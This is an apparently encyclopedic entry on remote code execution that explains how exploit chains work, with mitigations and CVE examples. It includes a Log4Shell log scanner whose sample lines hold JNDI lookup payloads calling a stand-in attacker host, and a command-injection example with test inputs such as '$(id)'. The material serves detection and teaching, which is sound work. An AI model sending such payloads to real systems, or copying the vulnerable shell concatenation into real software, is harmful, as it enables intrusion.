RCE (Remote Code Execution)
RCE is any vulnerability that lets a remote attacker run arbitrary code on the target system.
Definition
Remote Code Execution (RCE) is the umbrella term for any vulnerability that allows an attacker to make a target system execute code of the attacker's choosing without physical access. RCE is not itself a bug pattern — it is the outcome that ties a long list of underlying bug classes together: memory corruption (buffer overflow, use-after-free), deserialisation, command injection, template injection, file-upload-to-execute, JNDI / IL gadget chains, and many more.
RCE is the maximum severity any application bug can reach. A vulnerability scored "RCE" lets the attacker drop the rest of the kill chain at will — persistence, credential theft, lateral movement — limited only by the privileges of the process that took the input.
How it works
Every RCE is a chain. The "vulnerability" is the entry point that lets attacker-chosen bytes influence the program counter, the interpreter, or the shell. Modern exploit chains compose multiple primitives: a deserialisation gadget that calls a method, that method invokes a JNDI lookup, the JNDI lookup fetches a remote class, the remote class runs a static initialiser, the static initialiser shells out. Log4Shell is the textbook composed-RCE of the last decade.
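A defender's first question about a composed chain like the one above is where it can be observed. The entry point is the cheapest place: the JNDI lookup syntax has to arrive in a logged field before Log4j2 expands it. The scanner below is an added example written for this page, not code from Log4j or any vendor; the access-log lines are constructed, and the domain `attacker.example` and the names `scan_log`, `Hit` and `JNDI_RE` are assumptions of the example. It flags every line whose request or header fields contain the lookup prefix, case-insensitively, and records the source address so hits can be grouped by client.

```python
import re
from dataclasses import dataclass

# Case-insensitive match on the JNDI lookup prefix that Log4j2 expands.
# Deliberately narrow: it is an entry-point indicator, not a full parser.
JNDI_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)

# Constructed sample access-log lines (Combined Log Format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:03:14:09 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://attacker.example/a}"
10.0.0.9 - - [10/Dec/2021:03:14:11 +0000] "GET /api?q=${JNDI:rmi://attacker.example/b} HTTP/1.1" 400 0 "-" "curl/7.79"
10.0.0.7 - - [10/Dec/2021:03:14:12 +0000] "POST /search HTTP/1.1" 200 2048 "-" "python-requests/2.26"
"""


@dataclass
class Hit:
    line_no: int     # 1-based line within the scanned text
    source_ip: str   # first whitespace-separated field of the log line
    excerpt: str     # the matched lookup and a little context after it


def scan_log(text: str) -> list[Hit]:
    """Return one Hit per log line containing a JNDI lookup, in file order."""
    hits: list[Hit] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        match = JNDI_RE.search(line)
        if match is None:
            continue
        source_ip = line.split(" ", 1)[0]
        excerpt = line[match.start():match.start() + 60]
        hits.append(Hit(line_no, source_ip, excerpt))
    return hits


def sources_by_hit_count(hits: list[Hit]) -> dict[str, int]:
    """Group hits by client address so a noisy scanner stands out."""
    counts: dict[str, int] = {}
    for hit in hits:
        counts[hit.source_ip] = counts.get(hit.source_ip, 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for hit in found:
        print(f"line {hit.line_no} from {hit.source_ip}: {hit.excerpt}")
    print(sources_by_hit_count(found))
```

Both the user-agent (line 2) and the query string (line 3) are caught because the whole line is searched rather than one field; Log4j2 expands the lookup wherever an application chooses to log it, so the scan should not assume a particular field either. The match is on the literal prefix only, so it confirms exposure cheaply; the usual caveat applies that a narrow indicator is evidence of attempts, not of success, and the patch status of the host still decides the response.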
The relevant CWE depends on the underlying bug. RCE is often classified under CWE-94 (Code Injection) at a high level, but the more specific CWE — CWE-502 for deserialisation, CWE-78 for command injection, CWE-787 for out-of-bounds write — is the editorially correct one.
Impact
Total compromise of the affected host: arbitrary file read/write, credential theft, persistence, malware deployment, ransomware staging. Pre-authentication, network-reachable RCE is the highest-priority class of patch for any defender — CISA's Known Exploited Vulnerabilities (KEV) catalogue adds these on the first signal of in-the-wild exploitation.
Mitigation
RCE mitigation depends on the underlying bug class. Generic defences include least-privilege execution (run the affected service as a low-privileged user, in a sandbox, in a container with `--cap-drop=ALL`), defence in depth (egress filtering blocks the exploit's second-stage payload fetch), and aggressive patching — vendors typically publish RCE fixes as out-of-cycle releases. EDR products often catch the post-exploitation stage even when the initial primitive lands.
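Because the fix is specific to the bug class, a generic "sanitise input" rule is not enough; the defect has to be removed at the point where untrusted bytes reach the interpreter or shell. The pair of functions below is an added example for this page (not code from any of the projects named above) showing the CWE-78 case: one builds a shell string by concatenation, the other validates the value against a hostname allowlist and hands an argv list to the process API with no shell in between. The function names, the hostname grammar and the use of `ping` are assumptions of the example.

```python
import re
import subprocess

# Allowlist for a single hostname (RFC 1123 label shape). Anything a shell
# could interpret (';', '|', '&', '`', '$', newline, spaces) fails this
# pattern, as does a leading '-', which would otherwise be read as an option.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*$")
SHELL_METACHARS = frozenset(";|&`$\n\r(){}<>")


def build_command_vulnerable(host: str) -> str:
    """CWE-78 shape: the untrusted value is spliced into a shell command line.

    Returned rather than executed so the defect can be inspected safely; the
    bug is that every character of ``host`` reaches the shell's parser.
    """
    return "ping -c 1 " + host


def contains_shell_metachars(command_line: str) -> bool:
    """Heuristic check: would a POSIX shell see more than one simple command?"""
    return any(ch in SHELL_METACHARS for ch in command_line)


def build_command_hardened(host: str) -> list[str]:
    """Validate against the allowlist, then build argv with no shell involved.

    Raises ValueError for anything that is not a plain hostname. The returned
    list is passed to subprocess as separate arguments, so even a value that
    slipped past validation could not become a second command.
    """
    if len(host) > 253 or not HOSTNAME_RE.match(host):
        raise ValueError(f"rejected hostname: {host!r}")
    return ["ping", "-c", "1", host]


def run_hardened(host: str, timeout_s: float = 10.0) -> int:
    """Run the validated command without a shell and return its exit status."""
    argv = build_command_hardened(host)
    completed = subprocess.run(
        argv, shell=False, capture_output=True, timeout=timeout_s, check=False
    )
    return completed.returncode


if __name__ == "__main__":
    for candidate in ("example.com", "example.com; id", "$(id)", "-f"):
        try:
            print(candidate, "->", build_command_hardened(candidate))
        except ValueError as exc:
            print(candidate, "->", exc)
```

The two defences are independent and both matter: the allowlist rejects the value early with a clear error, and `shell=False` with an argv list means the process API never hands the string to `/bin/sh`, so the `;`, `$(...)` and leading `-` cases have nothing to exploit even if the allowlist were later loosened. The same shape, validate then bypass the interpreter, is what the deserialisation and template-injection fixes look like in their own domains.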
Examples
- CVE-2021-44228 (Log4Shell) — JNDI-driven RCE in Apache Log4j2.
- CVE-2022-22965 (Spring4Shell) — RCE in Spring Framework's data-binder.
- CVE-2017-5638 (Apache Struts) — OGNL injection RCE behind the Equifax breach.